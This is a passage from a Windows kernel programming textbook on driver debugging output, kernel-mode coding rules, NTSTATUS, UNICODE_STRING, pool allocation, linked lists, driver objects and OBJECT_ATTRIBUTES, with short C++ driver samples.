Notice the double parenthesis when using KdPrint. This is required because KdPrint is a macro, but
apparently accepts any number of arguments, a-la printf. Since macros cannot receive a variable number
Chapter 2: Getting Started with Kernel Development
31
of parameters, a compiler trick is used to call the DbgPrint function that does accept a variable number
of parameters.
With these statements in place, we would like to load the driver again and see these messages. We’ll use a
kernel debugger in chapter 4, but for now we’ll use a useful Sysinternals tool named DebugView.
Before running DebugView, you’ll need to make some preparations. First, starting with Windows Vista,
DbgPrint output is not actually generated unless a certain value is in the registry. You’ll have to add
a key named Debug Print Filter under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager (the
key typically does not exist). Within this new key, add a DWORD value named DEFAULT (not the default
value that exists in any key) and set its value to 8 (technically, any value with bit 3 set will do). Figure 2-6
shows the setting in RegEdit. Unfortunately, you’ll have to restart the system for this setting to take effect.
Figure 2-6: Debug Print Filter key in the registry
Once this setting has been applied, run DebugView (DbgView.exe) elevated. In the Options menu, make
sure Capture Kernel is selected (or press Ctrl+K). You can safely deselect Capture Win32 and Capture
Global Win32, so that user-mode output from various processes does not clutter the display.
DebugView is able to show kernel debug output even without the Registry value shown in figure
2-6 if you select Enable Verbose Kernel Output from its Capture menu. However, it seems this
option does not work on Windows 11, and the Registry setting is necessary.
Build the driver, if you haven’t already. Now you can load the driver again from an elevated command
window (sc start sample). You should see output in DebugView as shown in figure 2-7. If you unload
the driver, you’ll see another message appearing because the Unload routine was called. (The third output
line is from another driver and has nothing to do with our sample driver)
Chapter 2: Getting Started with Kernel Development
32
Figure 2-7: Sysinternals DebugView Output
Add code to the sample DriverEntry to output the Windows OS version: major, minor, and
build number. Use the RtlGetVersion function to retrieve the information. Check the results
with DebugView.
Summary
We’ve seen the tools you need to have for kernel development and wrote a very minimalistic driver to
prove the basic tools work. In the next chapter, we’ll look at the fundamental building blocks of kernel
APIs, concepts, and fundamental structures.
Chapter 3: Kernel Programming Basics
In this chapter, we’ll dig deeper into kernel APIs, structures, and definitions. We’ll also examine some of
the mechanisms that invoke code in a driver. Finally, we’ll put all that knowledge together to create our
first functional driver and client application.
In this chapter:
• General Kernel Programming Guidelines
• Debug vs. Release Builds
• The Kernel API
• Functions and Error Codes
• Strings
• Dynamic Memory Allocation
• Linked Lists
• Object Attributes
• The Driver Object
• Device Objects
General Kernel Programming Guidelines
Developing kernel drivers requires the Windows Driver Kit (WDK), where the appropriate headers and
libraries needed are located. The kernel APIs consist of C functions, very similar in essence to user-mode
APIs. There are several differences, however. Table 3-1 summarizes the important differences between
user-mode programming and kernel-mode programming.
Table 3-1: Differences between user mode and kernel mode development
User Mode
Kernel Mode
Unhandled Exceptions
Unhandled exceptions crash the process
Unhandled exceptions crashes the system
Termination
When a process terminates, all private
memory and resources are freed
automatically
If a driver unloads without freeing
everything it was using, there is a leak,
only resolved in the next boot
Return values
API errors are sometimes ignored
Should (almost) never ignore errors
IRQL
Always PASSIVE_LEVEL (0)
May be DISPATCH_LEVEL (2) or higher
Chapter 3: Kernel Programming Basics
34
Table 3-1: Differences between user mode and kernel mode development
User Mode
Kernel Mode
Bad coding
Typically localized to the process
Can have system-wide effects
Testing and Debugging
Typical testing and debugging done on
the developer’s machine
Debugging must be done with another
machine
Libraries
Can use almost and C/C++ library (e.g.
STL, boost)
Most standard libraries cannot be used
Exception Handling
Can use C++ exceptions or Structured
Exception Handling (SEH)
Only SEH can be used
C++ Usage
Full C++ runtime available
No C++ runtime
Unhandled Exceptions
Exceptions occurring in user-mode that are not caught by the program cause the process to terminate
prematurely. Kernel-mode code, on the other hand, being implicitly trusted, cannot recover from an
unhandled exception. Such an exception causes the system to crash with the infamous Blue screen of
death (BSOD) (newer versions of Windows have more diverse colors for the crash screen). The BSOD may
first appear to be a form of punishment, but it’s essentially a protection mechanism. The rationale being
it, is that allowing the code to continue execution could cause irreversible damage to Windows (such as
deleting important files or corrupting the registry) that may cause the system to fail boot. It’s better, then,
to stop everything immediately to prevent potential damage. We’ll discuss the BSOD in more detail in
chapter 6.
All this leads to at least one conclusion: kernel code must be carefully programmed, meticulous, and not
skip any details, or error checks.
Termination
When a process terminates, for whatever reason - either normally, because of an unhandled exception,
or terminated by external code - it never leaks anything: all private memory is freed, and all handles are
closed. Of course, premature handle closing may cause some loss of data, such as a file handle being closed
before flushing some data to disk - but there are no resource leaks beyond the lifetime of the process; this
is guaranteed by the kernel.
Kernel drivers, on the other hand, don’t provide such a guarantee. If a driver unloads while still holding
onto allocated memory or open kernel handles - these resources will not be freed automatically, only
released at the next system boot.
Why is that? Can’t the kernel keep track of a driver’s allocations and resource usage so these can be freed
automatically when the driver unloads?
Theoretically, this would have been possible to achieve (although currently the kernel does not track such
resource usage). The real issue is that it would be too dangerous for the kernel to attempt such cleanup.
The kernel has no way of knowing whether the driver leaked those resources for a reason; for example, the
driver could allocate some buffer and then pass it to another driver, with which it cooperates. That second
driver may use the memory buffer and free it eventually. If the kernel attempted to free the buffer when
Chapter 3: Kernel Programming Basics
35
the first driver unloads, the second driver would cause an access violation when accessing that now-freed
buffer, causing a system crash.
This emphasizes the responsibility of a kernel driver to properly clean up after itself; no one else will do it.
Function Return Values
In typical user-mode code, return values from API functions are sometimes ignored, the developer being
somewhat optimistic that the called function is unlikely to fail. This may or may not be appropriate for
one function or another, but in the worst case, an unhandled exception would later crash the process; the
system, however, remains intact.
Ignoring return values from kernel APIs is much more dangerous (see the previous Termination section),
and generally should be avoided. Even seemingly “innocent” looking functions can fail for unexpected
reasons, so the golden rule here is - always check return status values from kernel APIs.
IRQL
Interrupt Request Level (IRQL) is an important kernel concept that will be further discussed in chapter 6.
Suffice it to say at this point that normally a processor’s IRQL is zero, and in particular it’s always zero
when user-mode code is executing. In kernel mode, it’s still zero most of the time - but not all the time.
Some restrictions on code execution exist at IRQL 2 and higher, which means the driver writer must be
careful to use only allowed APIs at that high IRQL. The effects of higher than zero IRQLs are discussed in
chapter 6.
C++ Usage
In user mode programming, C++ has been used for many years, and it works well when combined with
user-mode Windows APIs. With kernel code, Microsoft started officially supporting C++ with Visual
Studio 2012 and WDK 8. C++ is not mandatory, of course, but it has some important benefits related
to resource cleanup, with a C++ idiom called Resource Acquisition Is Initialization (RAII). We’ll use this
RAII idiom quite a bit to make sure we don’t leak resources.
C++ as a language is almost fully supported for kernel code. But there is no C++ runtime in the kernel,
and so some C++ features just cannot be used:
• The new and delete operators are not supported and will fail to compile. This is because their
normal operation is to allocate from a user-mode heap, which is irrelevant within the kernel. The
kernel API has “replacement” functions that are more closely modeled after the C functions malloc
and free. We’ll discuss these functions later in this chapter. It is possible, however, to overload the
new and delete operators similarly as is sometimes done in user-mode, and invoke the kernel
allocation and free functions in the implementation. We’ll see how to do that later in this chapter
as well.
• Global variables that have non-default constructors will not be called - there is no C/C++ runtime
to call these constructors. These situations must be avoided, but there are some workarounds:
– Avoid any code in the constructor and instead create some Init function to be called explicitly
from driver code (e.g. from DriverEntry).
Chapter 3: Kernel Programming Basics
36
– Allocate a pointer only as a global (or static) variable, and create the actual instance
dynamically. The compiler will generate the correct code to invoke the constructor. This works
assuming the new and delete operators have been overloaded, as described later in this
chapter.
• The C++ exception handling keywords (try, catch, throw) do not compile. This is because
the C++ exception handling mechanism requires its own runtime, which is not present in the
kernel. Exception handling can only be done using Structured Exception Handling (SEH) - a kernel
mechanism to handle exceptions. We’ll take a detailed look at SEH in chapter 6.
• The standard C++ libraries are not available in the kernel. Although most are template-based, these
do not compile, because they may depend on user-mode libraries and semantics. That said, C++
templates as a language feature work just fine. One good usage of templates is to create alternatives
for a kernel-mode library types, based on similar types from the user-mode standard C++ library,
such as std::vector<>, std::wstring, etc.
The code examples in this book make some use of C++. The features mostly used in the code examples
are:
• The nullptr keyword, representing a true NULL pointer.
• The auto keyword that allows type inference when declaring and initializing variables. This is
useful to reduce clutter, save some typing, and focus on the important pieces.
• Templates will be used where they make sense.
• Overloading of the new and delete operators.
• Constructors and destructors, especially for building RAII types.
Any C++ standard can be used for kernel development. The Visual Studio setting for new projects is to
use C++ 14. However, you can change the C++ compiler standard to any other setting, including C++ 20
(the latest standard as of this writing). Some features we’ll use later will depend on C++ 17 at least.
Strictly speaking, kernel drivers can be written in pure C without any issues. If you prefer to go that route,
use files with a C extension rather than CPP. This will automatically invoke the C compiler for these files.
Testing and Debugging
With user-mode code, testing is generally done on the developer’s machine (if all required dependencies
can be satisfied). Debugging is typically done by attaching the debugger (Visual Studio in most cases) to
the running process or launching an executable and attaching to the process.
With kernel code, testing is typically done on another machine, usually a virtual machine hosted on
the developer’s machine. This ensures that if a BSOD occurs, the developer’s machine is unaffected.
Debugging kernel code must be done with another machine, where the actual driver is executing. This
is because hitting a breakpoint in kernel-mode freezes the entire machine, not just a particular process.
The developer’s machine hosts the debugger itself, while the second machine (again, usually a virtual
machine) executes the driver code. These two machines must be connected through some mechanism
so data can flow between the host (where the debugger is running) and the target. We’ll look at kernel
debugging in more detail in chapter 5.
Chapter 3: Kernel Programming Basics
37
Debug vs. Release Builds
Just like with user-mode projects, building kernel drivers can be done in Debug or Release mode. The
differences are similar to their user-mode counterparts - Debug builds use no compiler optimizations by
default, but are easier to debug. Release builds utilize full compiler optimizations by default to produce
the fastest and smallest code possible. There are a few differences, however.
The terms in kernel terminology are Checked (Debug) and Free (Release). Although Visual Studio kernel
projects continue to use the Debug/Release terms, older documentation uses the Checked/Free terms. From
a compilation perspective, kernel Debug builds define the symbol DBG and set its value to 1 (compared to
the _DEBUG symbol defined in user mode). This means you can use the DBG symbol to distinguish between
Debug and Release builds with conditional compilation. This is, for example, what the KdPrint macro
does: in Debug builds, it compiles to calling DbgPrint, while in Release builds it compiles to nothing,
resulting in KdPrint calls having no effect in Release builds. This is usually what you want because these
calls are relatively expensive. We’ll discuss other ways of logging information in chapter 5.
The Kernel API
Kernel drivers use exported functions from kernel components. These functions will be referred to as the
Kernel API. Most functions are implemented within the kernel module itself (NtOskrnl.exe), but some may
be implemented by other kernel modules, such the HAL (hal.dll).
The Kernel API is a large set of C functions. Most of these start with a prefix suggesting the component
implementing that function. Table 3-2 shows some of the common prefixes and their meaning:
Table 3-2: Common kernel API prefixes
Prefix
Meaning
Example
Ex
General executive functions
ExAllocatePoolWithTag
Ke
General kernel functions
KeAcquireSpinLock
Mm
Memory manager
MmProbeAndLockPages
Rtl
General runtime library
RtlInitUnicodeString
FsRtl
file system runtime library
FsRtlGetFileSize
Flt
file system mini-filter library
FltCreateFile
Ob
Object manager
ObReferenceObject
Io
I/O manager
IoCompleteRequest
Se
Security
SeAccessCheck
Ps
Process manager
PsLookupProcessByProcessId
Po
Power manager
PoSetSystemState
Wmi
Windows management instrumentation
WmiTraceMessage
Zw
Native API wrappers
ZwCreateFile
Chapter 3: Kernel Programming Basics
38
Table 3-2: Common kernel API prefixes
Prefix
Meaning
Example
Hal
Hardware abstraction layer
HalExamineMBR
Cm
Configuration manager (registry)
CmRegisterCallbackEx
If you take a look at the exported functions list from NtOsKrnl.exe, you’ll find many functions that are
not documented in the Windows Driver Kit; this is just a fact of a kernel developer’s life - not everything
is documented.
One set of functions bears discussion at this point - the Zw prefixed functions. These functions mirror
native APIs available as gateways from NtDll.Dll with the actual implementation provided by the
Executive. When an Nt function is called from user mode, such as NtCreateFile, it reaches the Executive
at the actual NtCreateFile implementation. At this point, NtCreateFile might do various checks
based on the fact that the original caller is from user mode. This caller information is stored on a thread-
by-thread basis, in the undocumented PreviousMode member in the KTHREAD structure for each thread.
You can query the previous processor mode by calling the documented ExGetPreviousMode API.
On the other hand, if a kernel driver needs to call a system service, it should not be subjected to the
same checks and constraints imposed on user-mode callers. This is where the Zw functions come into
play. Calling a Zw function sets the previous caller mode to KernelMode (0) and then invokes the
native function. For example, calling ZwCreateFile sets the previous caller to KernelMode and then
calls NtCreateFile, causing NtCreateFile to bypass some security and buffer checks that would
otherwise be performed. The bottom line is that kernel drivers should call the Zw functions unless there
is a compelling reason to do otherwise.
Functions and Error Codes
Most kernel API functions return a status indicating success or failure of an operation. This is typed as
NTSTATUS, a signed 32-bit integer. The value STATUS_SUCCESS (0) indicates success. A negative value
indicates some kind of error. You can find all the defined NTSTATUS values in the file <ntstatus.h>.
Most code paths don’t care about the exact nature of the error, and so testing the most significant bit is
enough to find out whether an error occurred. This can be done with the NT_SUCCESS macro. Here is an
example that tests for failure and logs an error if that is the case:
Chapter 3: Kernel Programming Basics
39
NTSTATUS DoWork() {
NTSTATUS status = CallSomeKernelFunction();
if(!NT_SUCCESS(Statue)) {
KdPirnt((L"Error occurred: 0x%08X\n", status));
return status;
}
// continue with more operations
return STATUS_SUCCESS;
}
In some cases, NTSTATUS values are returned from functions that eventually bubble up to user mode. In
these cases, the STATUS_xxx value is translated to some ERROR_yyy value that is available to user-mode
through the GetLastError function. Note that these are not the same numbers; for one, error codes in
user-mode have positive values (zero is still success). Second, the mapping is not one-to-one. In any case,
this is not generally a concern for a kernel driver.
Internal kernel driver functions also typically return NTSTATUS to indicate their success/failure status.
This is usually convenient, as these functions make calls to kernel APIs and so can propagate any error
by simply returning the same status they got back from the particular API. This also implies that the
“real” return values from driver functions is typically returned through pointers or references provided as
arguments to the function.
Return NTSTATUS from your own functions. It will make it easier and consistent to report
errors.
Strings
The kernel API uses strings in many scenarios as needed. In some cases, these strings are simple Unicode
pointers (wchar_t* or one of their typedefs such as WCHAR*), but most functions dealing with strings
expect a structure of type UNICODE_STRING.
The term Unicode as used in this book is roughly equivalent to UTF-16, which means 2 bytes per character.
This is how strings are stored internally within kernel components. Unicode in general is a set of standards
related to character encoding. You can find more information at https://unicode.org.
The UNICODE_STRING structure represents a string with its length and maximum length known. Here is
a simplified definition of the structure:
Chapter 3: Kernel Programming Basics
40
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWCH
Buffer;
} UNICODE_STRING;
typedef UNICODE_STRING *PUNICODE_STRING;
typedef const UNICODE_STRING *PCUNICODE_STRING;
The Length member is in bytes (not characters) and does not include a Unicode-NULL terminator, if one
exists (a NULL terminator is not mandatory). The MaximumLength member is the number of bytes the
string can grow to without requiring a memory reallocation.
Manipulating UNICODE_STRING structures is typically done with a set of Rtl functions that deal
specifically with strings. Table 3-3 lists some of the common functions for string manipulation provided
by the Rtl functions.
Table 3-3: Common UNICODE_STRING functions
Function
Description
RtlInitUnicodeString
Initializes a UNICODE_STRING based on an existing C-string
pointer. It sets Buffer, then calculates the Length and sets
MaximumLength to the same value. Note that this function does
not allocate any memory - it just initializes the internal members.
RtlCopyUnicodeString
Copies one UNICODE_STRING to another. The destination string
pointer (Buffer) must be allocated before the copy and
MaximumLength set appropriately.
RtlCompareUnicodeString
Compares two UNICODE_STRINGs (equal, less, greater), specifying
whether to do a case sensitive or insensitive comparison.
RtlEqualUnicodeString
Compares two UNICODE_STRINGs for equality, with case
sensitivity specification.
RtlAppendUnicodeStringToString
Appends one UNICODE_STRING to another.
RtlAppendUnicodeToString
Appends UNICODE_STRING to a C-style string.
In addition to the above functions, there are functions that work on C-string pointers. Moreover, some of
the well-known string functions from the C Runtime Library are implemented within the kernel as well
for convenience: wcscpy_s, wcscat_s, wcslen, wcscpy_s, wcschr, strcpy, strcpy_s and others.
The wcs prefix works with C Unicode strings, while the str prefix works with C Ansi strings. The
suffix _s in some functions indicates a safe function, where an additional argument indicating
the maximum length of the string must be provided so the function would not transfer more
data than that size.
Never use the non-safe functions. You can include <dontuse.h> to get errors for deprecated
functions if you do use these in code.
Chapter 3: Kernel Programming Basics
41
Dynamic Memory Allocation
Drivers often need to allocate memory dynamically. As discussed in chapter 1, kernel thread stack size is
rather small, so any large chunk of memory should be allocated dynamically.
The kernel provides two general memory pools for drivers to use (the kernel itself uses them as well).
• Paged pool - memory pool that can be paged out if required.
• Non-Paged Pool - memory pool that is never paged out and is guaranteed to remain in RAM.
Clearly, the non-paged pool is a “better” memory pool as it can never incur a page fault. We’ll see
later in this book that some cases require allocating from non-paged pool. Drivers should use this pool
sparingly, only when necessary. In all other cases, drivers should use the paged pool. The POOL_TYPE
enumeration represents the pool types. This enumeration includes many “types” of pools, but only three
should be used by drivers: PagedPool, NonPagedPool, NonPagedPoolNx (non-page pool without
execute permissions).
Table 3-4 summarizes the most common functions used for working with the kernel memory pools.
Table 3-4: Functions for kernel memory pool allocation
Function
Description
ExAllocatePool
Allocate memory from one of the pools with a default tag. This function is
considered obsolete. The next function in this table should be used instead
ExAllocatePoolWithTag
Allocate memory from one of the pools with the specified tag
ExAllocatePoolZero
Same as ExAllocatePoolWithTag, but zeroes out the memory block
ExAllocatePoolWithQuotaTag
Allocate memory from one of the pools with the specified tag and charge
the current process quota for the allocation
ExFreePool
Free an allocation. The function knows from which pool the allocation
was made
ExAllocatePool calls ExAllocatePoolWithTag using the tag enoN (the word “none” in
reverse). Older Windows versions used ‘ mdW (WDM in reverse). You should avoid
this function and use ExAllocatePoolWithTag‘ instead.
ExAllocatePoolZero
is
implemented
inline
in
wdm.h
by
calling
ExAllocatePoolWithTag and adding the POOL_ZERO_ALLOCATION (=1024) flag to
the pool type.
Other memory management functions are covered in chapter 8, “Advanced Programming Techniques”.
Chapter 3: Kernel Programming Basics
42
The tag argument allows “tagging” an allocation with a 4-byte value. Typically this value is comprised
of up to 4 ASCII characters logically identifying the driver, or some part of the driver. These tags can be
used to help identify memory leaks - if any allocations tagged with the driver’s tag remain after the driver
is unloaded. These pool allocations (with their tags) can be viewed with the Poolmon WDK tool, or my
own PoolMonXv2 tool (downloadable from http://www.github.com/zodiacon/AllTools). Figure 3-1 shows
a screenshot of PoolMonXv2.
Figure 3-1: PoolMonXv2
You must use tags comprised of printable ASCII characters. Otherwise, running the driver
under the control of the Driver Verifier (described in chapter 11) would lead to Driver Verifier
complaining.
The following code example shows memory allocation and string copying to save the registry path passed
to DriverEntry, and freeing that string in the Unload routine:
Chapter 3: Kernel Programming Basics
43
// define a tag (because of little endianness, viewed as 'abcd')
#define DRIVER_TAG 'dcba'
UNICODE_STRING g_RegistryPath;
extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
UNREFERENCED_PARAMETER(DriverObject);
DriverObject->DriverUnload = SampleUnload;
g_RegistryPath.Buffer = (WCHAR*)ExAllocatePoolWithTag(PagedPool,
RegistryPath->Length, DRIVER_TAG);
if (g_RegistryPath.Buffer == nullptr) {
KdPrint(("Failed to allocate memory\n"));
return STATUS_INSUFFICIENT_RESOURCES;
}
g_RegistryPath.MaximumLength = RegistryPath->Length;
RtlCopyUnicodeString(&g_RegistryPath,
(PCUNICODE_STRING)RegistryPath);
// %wZ is for UNICODE_STRING objects
KdPrint(("Original registry path: %wZ\n", RegistryPath));
KdPrint(("Copied registry path: %wZ\n", &g_RegistryPath));
//...
return STATUS_SUCCESS;
}
void SampleUnload(_In_ PDRIVER_OBJECT DriverObject) {
UNREFERENCED_PARAMETER(DriverObject);
ExFreePool(g_RegistryPath.Buffer);
KdPrint(("Sample driver Unload called\n"));
}
Linked Lists
The kernel uses circular doubly linked lists in many of its internal data structures. For example, all processes
on the system are managed by EPROCESS structures, connected in a circular doubly linked list, where its
head is stored the kernel variable PsActiveProcessHead.
All these lists are built in the same way, centered around the LIST_ENTRY structure defined like so:
Chapter 3: Kernel Programming Basics
44
typedef struct _LIST_ENTRY {
struct _LIST_ENTRY *Flink;
struct _LIST_ENTRY *Blink;
} LIST_ENTRY, *PLIST_ENTRY;
Figure 3-2 depicts an example of such a list containing a head and three instances.
Figure 3-2: Circular linked list
One such structure is embedded inside the real structure of interest. For example, in the EPROCESS
structure, the member ActiveProcessLinks is of type LIST_ENTRY, pointing to the next and previous
LIST_ENTRY objects of other EPROCESS structures. The head of a list is stored separately; in the case of
the process, that’s PsActiveProcessHead.
To get the pointer to the actual structure of interest given the address of a LIST_ENTRY can be obtained
with the CONTAINING_RECORD macro.
For example, suppose you want to manage a list of structures of type MyDataItem defined like so:
struct MyDataItem {
// some data members
LIST_ENTRY Link;
// more data members
};
When working with these linked lists, we have a head for the list, stored in a variable. This means that
natural traversal is done by using the Flink member of the list to point to the next LIST_ENTRY in the
list. Given a pointer to the LIST_ENTRY, what we’re really after is the MyDataItem that contains this
list entry member. This is where the CONTAINING_RECORD comes in:
MyDataItem* GetItem(LIST_ENTRY* pEntry) {
return CONTAINING_RECORD(pEntry, MyDataItem, Link);
}
The macro does the proper offset calculation and does the casting to the actual data type (MyDataItem in
the example).
Table 3-5 shows the common functions for working with these linked lists. All operations use constant
time.
Chapter 3: Kernel Programming Basics
45
Table 3-5: Functions for working with circular linked lists
Function
Description
InitializeListHead
Initializes a list head to make an empty list. The forward and back
pointers point to the forward pointer.
InsertHeadList
Insert an item to the head of the list.
InsertTailList
Insert an item to the tail of the list.
IsListEmpty
Check if the list is empty.
RemoveHeadList
Remove the item at the head of the list.
RemoveTailList
Remove the item at the tail of the list.
RemoveEntryList
Remove a specific item from the list.
ExInterlockedInsertHeadList
Insert an item at the head of the list atomically by using the specified
spinlock.
ExInterlockedInsertTailList
Insert an item at the tail of the list atomically by using the specified
spinlock.
ExInterlockedRemoveHeadList
Remove an item from the head of the list atomically by using the
specified spinlock.
The last three functions in table 3-4 perform the operation atomically using a synchronization primitive
called a spin lock. Spin locks are discussed in chapter 6.
The Driver Object
We’ve already seen that the DriverEntry function accepts two arguments, the first is a driver object
of some kind. This is a semi-documented structure called DRIVER_OBJECT defined in the WDK headers.
“Semi-documented” means that some of its members are documented for driver’s use and some are not.
This structure is allocated by the kernel and partially initialized. Then it’s provided to DriverEntry (and
before the driver unloads to the Unload routine as well). The role of the driver at this point is to further
initialize the structure to indicate what operations are supported by the driver.
We’ve seen one such “operation” in chapter 2 - the Unload routine. The other important set of operations
to initialize are called Dispatch Routines. This is an array of function pointers, stored in the in the
MajorFunction member of DRIVER_OBJECT. This set specifies which operations the driver supports,
such as Create, Read, Write, and so on. These indices are defined with the IRP_MJ_ prefix. Table 3-6 shows
some common major function codes and their meaning.
Chapter 3: Kernel Programming Basics
46
Table 3-6: Common major function codes
Major function
Description
IRP_MJ_CREATE (0)
Create operation. Typically invoked for CreateFile or
ZwCreateFile calls.
IRP_MJ_CLOSE (2)
Close operation. Normally invoked for CloseHandle or
ZwClose.
IRP_MJ_READ (3)
Read operation. Typically invoked for ReadFile,
ZwReadFile and similar read APIs.
IRP_MJ_WRITE (4)
Write operation. Typically invoked for WriteFile,
ZwWriteFile, and similar write APIs.
IRP_MJ_DEVICE_CONTROL (14)
Generic call to a driver, invoked because of
DeviceIoControl or ZwDeviceIoControlFile calls.
IRP_MJ_INTERNAL_DEVICE_CONTROL (15)
Similar to the previous one, but only available for kernel-mode
callers.
IRP_MJ_SHUTDOWN (16)
Called when the system shuts down if the driver has registered
for shutdown notification with
IoRegisterShutdownNotification.
IRP_MJ_CLEANUP (18)
Invoked when the last handle to a file object is closed, but the
file object’s reference count is not zero.
IRP_MJ_PNP (31)
Plug and play callback invoked by the Plug and Play Manager.
Generally interesting for hardware-based drivers or filters to
such drivers.
IRP_MJ_POWER (22)
Power callback invoked by the Power Manager. Generally
interesting for hardware-based drivers or filters to such drivers.
Initially, the MajorFunction array is initialized by the kernel to point to a kernel internal routine,
IopInvalidDeviceRequest, which returns a failure status to the caller, indicating the operation is
not supported. This means the driver, in its DriverEntry routine only needs to initialize the actual
operations it supports, leaving all the other entries in their default values.
For example, our Sample driver at this point does not support any dispatch routines, which means there is
no way to communicate with the driver. A driver must at least support the IRP_MJ_CREATE and IRP_-
MJ_CLOSE operations, to allow opening a handle to one of the device objects for the driver. We’ll put these
ideas into practice in the next chapter.
Object Attributes
One of the common structures that shows up in many kernel APIs is OBJECT_ATTRIBUTES, defined like
so:
Chapter 3: Kernel Programming Basics
47
typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
// SECURITY_DESCRIPTOR
PVOID SecurityQualityOfService;
// SECURITY_QUALITY_OF_SERVICE
} OBJECT_ATTRIBUTES;
typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;
typedef CONST OBJECT_ATTRIBUTES *PCOBJECT_ATTRIBUTES;
The structure is typically initialized with the InitializeObjectAttributes macro, that allows
specifying all the structure members except Length (set automatically by the macro), and Securi-
tyQualityOfService, which is not normally needed. Here is the description of the members:
• ObjectName is the name of the object to be created/located, provided as a pointer to a UNICODE_-
STRING. In some cases it may be ok to set it to NULL. For example, the ZwOpenProcess allows
opening a handle to a process given its PID. Since processes don’t have names, the ObjectName in
this case should be initialized to NULL.
• RootDirectory is an optional directory in the object manager namespace if the name of the object
is relative one. If ObjectName specifies a fully-qualified name, RootDirectory should be set to
NULL.
• Attributes allows specifying a set of flags that has effect on the operation in question. Table 3-7
shows the defined flags and their meaning.
• SecurityDescriptor is an optional security descriptor (SECURITY_DESCRIPTOR) to set on the
newly created object. NULL indicates the new object gets a default security descriptor, based on the
caller’s token.
• SecurityQualityOfService is an optional set of attributes related to the new object’s imper-
sonation level and context tracking mode. It has no meaning for most object types. Consult the
documentation for more information.
Table 3-7: Object attributes flags
Flag (OBJ_)
Description
INHERIT (2)
The returned handle should be marked as inheritable
PERMANENT (0x10)
The object created should be marked as permanent.
Permanent objects have an additional reference count that
prevents them from dying even if all handles to them are
closed
EXCLUSIVE (0x20)
If creating an object, the object is created with exclusive
access. No other handles can be opened to the object. If
opening an object, exclusive access is requested, which is
granted only if the object was originally created with this flag
Chapter 3: Kernel Programming Basics
48
Table 3-7: Object attributes flags
Flag (OBJ_)
Description
CASE_INSENSITIVE (0x40)
When opening an object, perform a case insensitive search for
its name. Without this flag, the name must match exactly
OPENIF (0x80)
Open the object if it exists. Otherwise, fail the operation
(don’t create a new object)
OPENLINK (0x100)
If the object to open is a symbolic link object, open the
symbolic link object itself, rather than following the symbolic
link to its target
KERNEL_HANDLE (0x200)
The returned handle should be a kernel handle. Kernel
handles are valid in any process context, and cannot be used
by user mode code
FORCE_ACCESS_CHECK (0x400)
Access checks should be performed even if the object is
opened in KernelMode access mode
IGNORE_IMPERSONATED_DEVICEMAP (0x800)
Use the process device map instead of the user’s if it’s
impersonating (consult the documentation for more
information on device maps)
DONT_REPARSE (0x1000)
Don’t follow a reparse point, if encountered. Instead an error
is returned (STATUS_REPARSE_POINT_ENCOUNTERED).
Reparse points are briefly discussed in chapter 11
A second way to initialize an OBJECT_ATTRIBUTES structure is available with the RTL_CONSTANT_-
OBJECT_ATTRIBUTES macro, that uses the most common members to set - the object’s name and the
attributes.
Let’s look at a couple of examples that use OBJECT_ATTRIBUTES. The first one is a function that opens
a handle to a process given its process ID. For this purpose, we’ll use the ZwOpenProcess API, defined
like so:
NTSTATUS ZwOpenProcess (
_Out_
PHANDLE ProcessHandle,
_In_
ACCESS_MASK DesiredAccess,
_In_
POBJECT_ATTRIBUTES ObjectAttributes,
_In_opt_
PCLIENT_ID ClientId);
It uses yet another common structure, CLIENT_ID that holds a process and/or a thread ID:
typedef struct _CLIENT_ID {
HANDLE UniqueProcess;
// PID, not handle
HANDLE UniqueThread;
// TID, not handle
} CLIENT_ID;
typedef CLIENT_ID *PCLIENT_ID;
To open a process, we need to specify the process ID in the UniqueProcess member. Note that although
the type of UniqueProcess is HANDLE, it is the unique ID of the process. The reason for the HANDLE type
Chapter 3: Kernel Programming Basics
49
is that process and thread IDs are generated from a private handle table. This also explains why process
and thread IDs are always multiple of four (just like normal handles), and why they don’t overlap.
With these details at hand, here is a process opening function:
NTSTATUS
OpenProcess(ACCESS_MASK accessMask, ULONG pid, PHANDLE phProcess) {
CLIENT_ID cid;
cid.UniqueProcess = ULongToHandle(pid);
cid.UniqueThread = nullptr;
OBJECT_ATTRIBUTES procAttributes =
RTL_CONSTANT_OBJECT_ATTRIBUTES(nullptr, OBJ_KERNEL_HANDLE);
return ZwOpenProcess(phProcess, accessMask, &procAttributes, &cid);
}
The ULongToHandle function performs the required casts so that the compiler is happy (HANDLE is
64-bit on a 64-bit system, but ULONG is always 32-bit). The only member used in the above code from
OBJECT_ATTRIBUTES is the Attributes flags.
The second example is a function that opens a handle to a file for read access, by using the ZwOpenFile
API, defined like so:
NTSTATUS ZwOpenFile(
_Out_
PHANDLE FileHandle,
_In_
ACCESS_MASK DesiredAccess,
_In_
POBJECT_ATTRIBUTES ObjectAttributes,
_Out_
PIO_STATUS_BLOCK IoStatusBlock,
_In_
ULONG ShareAccess,
_In_
ULONG OpenOptions);
A full discussion of the parameters to ZwOpenFile is reserved for chapter 11, but one thing is obvious:
the file name itself is specified using the OBJECT_ATTRIBUTES structure - there is no separate parameter
for that. Here is the full function opening a handle to a file for read access:
NTSTATUS OpenFileForRead(PCWSTR path, PHANDLE phFile) {
UNICODE_STRING name;
RtlInitUnicodeString(&name, path);
OBJECT_ATTRIBUTES fileAttributes;
InitializeObjectAttributes(&fileAttributes, &name,
OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, nullptr, nullptr);
IO_STATUS_BLOCK ioStatus;
return ZwOpenFile(phFile, FILE_GENERIC_READ,
&fileAttributes, &ioStatus, FILE_SHARE_READ, 0);
}
Chapter 3: Kernel Programming Basics
50
InitializeObjectAttributes is used to initialize the OBJECT_ATTRIBUTES structure, although the
RTL_CONSTANT_OBJECT_ATTRIBUTES could have been used just as well, since we’re only specifying
the name and attributes. Notice the need to turn the passed-in NULL-terminated C-string pointer into a
UNICODE_STRING with RtlInitUnicodeString.
Device Objects
Although a driver object may look like a good candidate for clients to talk to, this is not the case. The
actual communication endpoints for clients are device objects. Device objects are instances of the semi-
documented DEVICE_OBJECT structure. Without device objects, there is no one to talk to. This means
that at least one device object should be created by the driver and given a name, so that it may be contacted
by clients.
